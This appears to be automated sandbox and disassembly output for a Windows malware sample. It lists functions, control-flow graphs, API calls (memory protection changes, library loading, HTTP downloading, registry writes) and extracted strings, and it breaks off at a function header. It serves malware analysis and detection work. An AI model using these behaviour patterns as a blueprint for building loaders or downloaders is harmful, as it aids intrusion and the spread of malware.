                                                                    • API String ID: 3642901890-63410773
                                                                    • Opcode ID: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                                    • Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
                                                                    • Opcode Fuzzy Hash: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                                    • Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55
                                                                    Function 00402950 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 921 402950-402967 922 4029a9-4029bd call 408ec2 921->922 923 402969-402972 921->923 925 402974-402979 923->925 926 4029be-402a00 VirtualProtect 923->926 925->922 927 40297b-402980 925->927 926->922 929 402a02-402a24 GetLastError FormatMessageA 926->929 930 402982-40298a 927->930 931 402996-4029a3 call 402c10 927->931 932 402a27-402a2c 929->932 930->931 933 40298c-402994 930->933 936 4029a5 931->936 932->932 934 402a2e-402a7a LocalAlloc call 4028e0 OutputDebugStringA LocalFree * 2 call 408ec2 932->934 933->931 935 4029a8 933->935 935->922 936->935
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
                                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
                                                                    • LocalFree.KERNEL32(00000000), ref: 00402A62
                                                                    • LocalFree.KERNEL32(?), ref: 00402A67
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                                    • String ID: %s: %s$Error protecting memory page
                                                                    • API String ID: 839691724-1484484497
                                                                    • Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                                    • Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
                                                                    • Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                                    • Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88
                                                                    Function 00401880 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298networkfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1026 401880-401943 InternetSetFilePointer InternetReadFile 1028 40197d-4019c0 call 40aa10 HttpQueryInfoA 1026->1028 1032 401d25-401d53 call 408ec2 1028->1032 1033 4019c6-4019f9 CoCreateInstance 1028->1033 1033->1032 1035 4019ff-401a06 1033->1035 1035->1032 1037 401a0c-401a3a 1035->1037 1038 401a40-401a45 1037->1038 1038->1038 1039 401a47-401b08 call 402470 MultiByteToWideChar call 409035 MultiByteToWideChar 1038->1039 1044 401b10-401b19 1039->1044 1044->1044 1045 401b1b-401bd9 call 402310 call 408ed0 1044->1045 1052 401c0a-401c0c 1045->1052 1053 401bdb-401bea 1045->1053 1054 401c12-401c19 1052->1054 1055 401d19-401d20 1052->1055 1056 401c00-401c07 call 409027 1053->1056 1057 401bec-401bfa 1053->1057 1054->1055 1058 401c1f-401c93 call 409035 1054->1058 1055->1032 1056->1052 1057->1056 1059 401d56-401d5b call 40c26f 1057->1059 1067 401c95-401ca3 1058->1067 1068 401cff-401d15 call 408ed0 1058->1068 1070 401ca5-401cdb call 409035 call 4014b0 call 408ed0 1067->1070 1071 401cdd 1067->1071 1068->1055 1072 401ce0-401cfc call 4014b0 1070->1072 1071->1072 1072->1068
                                                                    APIs
                                                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
                                                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FileInternet$PointerRead
                                                                    • String ID: text
                                                                    • API String ID: 3197321146-999008199
                                                                    • Opcode ID: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                                    • Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
                                                                    • Opcode Fuzzy Hash: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                                    • Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54
                                                                    Function 0040EF0D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1277 40ef0d-40ef1a call 41366f 1280 40ef3c-40ef48 call 40ef4f ExitProcess 1277->1280 1281 40ef1c-40ef2a GetPEB 1277->1281 1281->1280 1282 40ef2c-40ef36 GetCurrentProcess TerminateProcess 1281->1282 1282->1280
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,74DEDF80,?,00000000,?,004114AD), ref: 0040EF2F
                                                                    • TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,74DEDF80,?,00000000,?,004114AD), ref: 0040EF36
                                                                    • ExitProcess.KERNEL32 ref: 0040EF48
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                    • Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
                                                                    • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                    • Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58
                                                                    Function 00D9A3A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1285 d9a3a6-d9a3bf 1286 d9a3c1-d9a3c3 1285->1286 1287 d9a3ca-d9a3d6 CreateToolhelp32Snapshot 1286->1287 1288 d9a3c5 1286->1288 1289 d9a3d8-d9a3de 1287->1289 1290 d9a3e6-d9a3f3 Module32First 1287->1290 1288->1287 1289->1290 1295 d9a3e0-d9a3e4 1289->1295 1291 d9a3fc-d9a404 1290->1291 1292 d9a3f5-d9a3f6 call d9a065 1290->1292 1296 d9a3fb 1292->1296 1295->1286 1295->1290 1296->1291
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00D9A3CE
                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 00D9A3EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D99000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d99000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 3833638111-0
                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                    • Instruction ID: 4395985c93f9b57827087ff6b9d5851abf6baa9e176a56992a48302be1502829
                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                    • Instruction Fuzzy Hash: 28F062326007116FDB203AFD9C8DA6E76E8EF49725F144528E646910C0DB70EC4546B2
                                                                    Function 00408020 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: emp$mixtwo
                                                                    • API String ID: 3472027048-2390925073
                                                                    • Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                                    • Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
                                                                    • Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                                    • Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA
                                                                    Function 004055C0 Relevance: 27.3, APIs: 5, Strings: 10, Instructions: 1092sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 129 4055c0-405667 call 40f20b call 40f042 Sleep call 402470 call 4038c0 138 405691-4056d2 call 402470 call 4038c0 129->138 139 405669-405675 129->139 152 405701-40570b 138->152 153 4056d4-4056e0 138->153 140 405687-40568e call 409027 139->140 141 405677-405685 139->141 140->138 141->140 143 4056f2 call 40c26f 141->143 150 4056f7-4056fe call 409027 143->150 150->152 155 405718-40571e 152->155 156 40570d-405716 152->156 153->150 157 4056e2-4056f0 153->157 158 405721-405723 155->158 156->158 157->143 157->150 159 405725-40572d 158->159 160 40574d-40576c call 408690 158->160 161 405730-405748 call 40f158 159->161 166 405a91-405ad8 call 408470 * 3 call 4064d0 call 408190 call 4022d0 call 408260 call 402200 160->166 167 405772-40580b call 40aa10 call 409035 call 40aa10 160->167 169 40574a 161->169 213 405bab-405bd6 call 406770 call 408150 call 4022d0 call 408260 call 402200 166->213 214 405ade-405aef call 4021b0 166->214 181 40580d-405821 call 409170 167->181 182 40584f-405856 167->182 169->160 181->182 192 405823-40584c call 409482 call 409126 181->192 186 405882-4058a0 182->186 187 405858-40587d 182->187 188 4058a3-4058a8 186->188 187->186 188->188 191 4058aa-405922 call 402470 call 408a60 188->191 206 405951-405969 191->206 207 405924-405930 191->207 192->182 212 405970-40598d 206->212 210 405932-405940 207->210 211 405947-40594e call 409027 207->211 210->211 215 405942 call 40c26f 210->215 211->206 217 4059a2-4059b0 call 401d60 212->217 218 40598f-405998 call 408ed0 212->218 272 405caa-405cd5 call 406b10 call 408150 call 4022d0 call 408260 call 402200 213->272 273 405bdc-405c53 call 4067f0 call 408150 call 4022d0 call 402250 call 402200 call 406870 call 408170 call 4022d0 call 402250 call 402200 call 4068f0 call 4081b0 call 4022d0 call 408260 call 402200 213->273 229 405af1-405b49 call 406550 call 4081b0 call 4022d0 call 402250 call 402200 call 4065e0 call 408170 call 4022d0 call 402250 call 402200 call 408440 214->229 230 405b4e-405ba6 call 406660 call 4081b0 call 4022d0 call 402250 call 402200 call 4066f0 call 408170 call 4022d0 call 402250 call 402200 call 408440 214->230 215->211 232 405a45-405a4c Sleep 217->232 233 4059b6-4059dc 217->233 218->217 346 406123-40627a call 4016b0 call 407c30 call 4081b0 call 4022d0 call 407bb0 call 408190 call 4022d0 call 407b10 call 4081e0 call 4022d0 call 408560 call 4085c0 call 408670 call 4085c0 call 408670 call 4085c0 call 402200 * 8 229->346 230->346 232->212 236 4059e0-4059e5 233->236 236->236 240 4059e7-405a0c call 402470 236->240 253 405a51-405a56 240->253 254 405a0e-405a11 240->254 256 405a58-405a5a 253->256 257 405a5c-405a5e 253->257 260 405a13-405a1a 254->260 261 405a6a-405a8c call 408440 call 402200 * 2 call 401710 254->261 263 405a61-405a63 256->263 257->263 260->232 267 405a1c-405a25 260->267 261->166 263->261 269 405a65 call 4037d0 263->269 274 405a27-405a35 267->274 275 405a3b-405a42 call 409027 267->275 269->261 326 405d99-405dc4 call 406eb0 call 408130 call 4022d0 call 408260 call 402200 272->326 327 405cdb-405d52 call 406b90 call 408150 call 4022d0 call 402250 call 402200 call 406c10 call 408170 call 4022d0 call 402250 call 402200 call 406c90 call 4081b0 call 4022d0 call 408260 call 402200 272->327 420 405c72-405c9d call 406a00 call 4081b0 call 4022d0 call 408260 call 402200 273->420 421 405c55 call 406980 273->421 274->143 274->275 275->232 374 405dca-405e67 call 406f30 call 408190 call 4022d0 call 402250 call 402200 call 406fb0 call 408170 call 4022d0 call 402250 call 402200 call 407030 call 408130 call 4022d0 call 402250 call 402200 call 4070b0 call 408230 call 4022d0 call 408260 call 402200 326->374 375 405eae-405ed9 call 4072d0 call 408100 call 4022d0 call 408260 call 402200 326->375 494 405d54-405d59 call 406d20 327->494 495 405d5e-405d89 call 406da0 call 4081b0 call 4022d0 call 408260 call 402200 327->495 632 406280-406299 call 4021f0 call 402070 346->632 623 405e73-405e9e call 4071c0 call 408230 call 4022d0 call 408260 call 402200 374->623 624 405e69-405e6e call 407140 374->624 434 405f59-405f84 call 4074f0 call 4081b0 call 4022d0 call 408260 call 402200 375->434 435 405edb-405f54 call 407360 call 408170 call 4022d0 call 402250 call 402200 call 4073e0 call 4081b0 call 4022d0 call 402250 call 402200 call 407470 call 408130 call 4022d0 call 402250 call 402200 375->435 420->346 497 405ca3-405ca8 call 406a90 420->497 433 405c5a-405c6d call 408190 call 4022d0 421->433 464 406115-40611e call 402250 call 402200 433->464 509 406004-40602f call 407700 call 408200 call 4022d0 call 408260 call 402200 434->509 510 405f86-405fff call 407580 call 408170 call 4022d0 call 402250 call 402200 call 407600 call 408190 call 4022d0 call 402250 call 402200 call 407680 call 408130 call 4022d0 call 402250 call 402200 434->510 435->346 464->346 494->433 495->346 566 405d8f-405d94 call 406e30 495->566 497->433 574 406031-406082 call 407790 call 408170 call 4022d0 call 402250 call 402200 call 407810 call 408130 call 4022d0 call 402250 call 402200 call 407890 509->574 575 406084-4060af call 407910 call 408130 call 4022d0 call 408260 call 402200 509->575 510->346 566->326 704 406102-406112 call 408130 call 4022d0 574->704 575->346 642 4060b1-4060fd call 407990 call 408170 call 4022d0 call 402250 call 402200 call 407a10 call 408190 call 4022d0 call 402250 call 402200 call 407a90 575->642 623->346 683 405ea4-405ea9 call 407250 623->683 624->623 660 4062d9-4062e0 Sleep 632->660 661 40629b-4062be call 4020b0 call 4022d0 call 4025c0 632->661 642->704 660->632 692 4062c0-4062cf call 4025c0 661->692 693 4062e2-406341 call 402200 call 408490 * 3 call 404ac0 661->693 683->375 692->693 706 4062d1-4062d4 call 402200 692->706 727 406343-406352 call 408490 call 403940 693->727 728 40635a-406385 call 407cc0 call 408200 call 4022d0 call 408260 call 402200 693->728 704->464 706->660 736 406357 727->736 744 406420-406451 call 407e30 call 4081b0 call 4022d0 call 408260 call 402200 728->744 745 40638b-4063bb call 4016b0 call 407d50 call 4080b0 call 4022d0 728->745 736->728 766 406453-4064b8 call 407fa0 call 408190 call 4022d0 call 407f20 call 408190 call 4022d0 call 407ec0 call 408090 call 4022d0 call 405460 744->766 767 4064bb-4064c0 call 4037d0 744->767 763 4063c0-4063d6 call 4021f0 call 402070 745->763 775 4063e7-406404 call 4020b0 call 4022d0 call 402200 763->775 776 4063d8-4063e3 Sleep 763->776 766->767 781 406409-40641b call 402200 call 401710 775->781 776->763 778 4063e5 776->778 778->781 781->744
                                                                    APIs
                                                                    • Sleep.KERNEL32(000005DC,?,756CD120), ref: 00405620
                                                                    • __Init_thread_footer.LIBCMT ref: 00405847
                                                                    • Sleep.KERNEL32(00000BB8,00000000,?,0042B77C,0042B92C,0042B92D,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 00405A4A
                                                                      • Part of subcall function 00406550: __Init_thread_footer.LIBCMT ref: 004065B9
                                                                      • Part of subcall function 004065E0: __Init_thread_footer.LIBCMT ref: 0040663A
                                                                      • Part of subcall function 00407C30: __Init_thread_footer.LIBCMT ref: 00407C99
                                                                      • Part of subcall function 00407BB0: __Init_thread_footer.LIBCMT ref: 00407C09
                                                                      • Part of subcall function 00407B10: __Init_thread_footer.LIBCMT ref: 00407B8D
                                                                    • Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,004272E8,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 004062DE
                                                                    • Sleep.KERNEL32(00000BB8,00000000,00000000,004272E8), ref: 004063DD
                                                                      • Part of subcall function 00407FA0: __Init_thread_footer.LIBCMT ref: 00407FF9
                                                                      • Part of subcall function 00407F20: __Init_thread_footer.LIBCMT ref: 00407F79
                                                                      • Part of subcall function 00407EC0: __Init_thread_footer.LIBCMT ref: 00407F11
                                                                      • Part of subcall function 004055C0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
                                                                      • Part of subcall function 004055C0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
                                                                      • Part of subcall function 004055C0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
                                                                      • Part of subcall function 004055C0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footer$Sleep$CloseCreateOpenValue
                                                                    • String ID: DFEK$KDOX$Q)9$SUB=$]DFE$^OX*$get$mixone$updateSW$viFO
                                                                    • API String ID: 2078494684-1136066708
                                                                    • Opcode ID: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                                    • Instruction ID: f649a411d8851b1a91c0a488fce11130e3673d7bad0c40fe0d5f826dd2b8960c
                                                                    • Opcode Fuzzy Hash: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                                    • Instruction Fuzzy Hash: 3F82AF71D001049ADB14FBB5C95ABEEB3789F14308F5081BEF412771D2EF786A49CAA9
                                                                    Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                                    • __cftof.LIBCMT ref: 10001624
                                                                    • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                                    • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                                    • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                                    • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                                    • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                                    • String ID: GET$http://
                                                                    • API String ID: 1233269984-1632879366
                                                                    • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                                    • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                                    • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                                    • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0
                                                                    Function 00401740 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 103networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
                                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD
                                                                      • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3
                                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
                                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829
                                                                    Strings
                                                                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
                                                                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
                                                                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB
                                                                    • text, xrefs: 00401B5C
                                                                    • GET, xrefs: 00401F81
                                                                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
                                                                    • API String ID: 2146599340-3782612381
                                                                    • Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                                    • Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
                                                                    • Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                                    • Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5
                                                                    Function 00E8003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 942 e8003c-e80047 943 e80049 942->943 944 e8004c-e80263 call e80a3f call e80e0f call e80d90 VirtualAlloc 942->944 943->944 959 e8028b-e80292 944->959 960 e80265-e80289 call e80a69 944->960 962 e802a1-e802b0 959->962 964 e802ce-e803c2 VirtualProtect call e80cce call e80ce7 960->964 962->964 965 e802b2-e802cc 962->965 971 e803d1-e803e0 964->971 965->962 972 e80439-e804b8 VirtualFree 971->972 973 e803e2-e80437 call e80ce7 971->973 974 e804be-e804cd 972->974 975 e805f4-e805fe 972->975 973->971 977 e804d3-e804dd 974->977 978 e8077f-e80789 975->978 979 e80604-e8060d 975->979 977->975 984 e804e3-e80505 LoadLibraryA 977->984 982 e8078b-e807a3 978->982 983 e807a6-e807b0 978->983 979->978 985 e80613-e80637 979->985 982->983 986 e8086e-e808be LoadLibraryA 983->986 987 e807b6-e807cb 983->987 988 e80517-e80520 984->988 989 e80507-e80515 984->989 990 e8063e-e80648 985->990 994 e808c7-e808f9 986->994 991 e807d2-e807d5 987->991 992 e80526-e80547 988->992 989->992 990->978 993 e8064e-e8065a 990->993 995 e80824-e80833 991->995 996 e807d7-e807e0 991->996 997 e8054d-e80550 992->997 993->978 998 e80660-e8066a 993->998 999 e808fb-e80901 994->999 1000 e80902-e8091d 994->1000 1006 e80839-e8083c 995->1006 1001 e807e2 996->1001 1002 e807e4-e80822 996->1002 1003 e805e0-e805ef 997->1003 1004 e80556-e8056b 997->1004 1005 e8067a-e80689 998->1005 999->1000 1001->995 1002->991 1003->977 1007 e8056d 1004->1007 1008 e8056f-e8057a 1004->1008 1009 e8068f-e806b2 1005->1009 1010 e80750-e8077a 1005->1010 1006->986 1011 e8083e-e80847 1006->1011 1007->1003 1013 e8059b-e805bb 1008->1013 1014 e8057c-e80599 1008->1014 1015 e806ef-e806fc 1009->1015 1016 e806b4-e806ed 1009->1016 1010->990 1017 e80849 1011->1017 1018 e8084b-e8086c 1011->1018 1025 e805bd-e805db 1013->1025 1014->1025 1019 e8074b 1015->1019 1020 e806fe-e80748 1015->1020 1016->1015 1017->986 1018->1006 1019->1005 1020->1019 1025->997
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00E8024D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID: cess$kernel32.dll
                                                                    • API String ID: 4275171209-1230238691
                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                    • Instruction ID: 42f56b1078da874e31e861965301d6022a0c63e1c579795fd0a01c2c3590a7ff
                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                    • Instruction Fuzzy Hash: 59526974A01229DFDBA4DF58C984BA8BBB1BF09304F1480D9E54DAB351DB30AE89DF14
                                                                    Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264networkcomfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
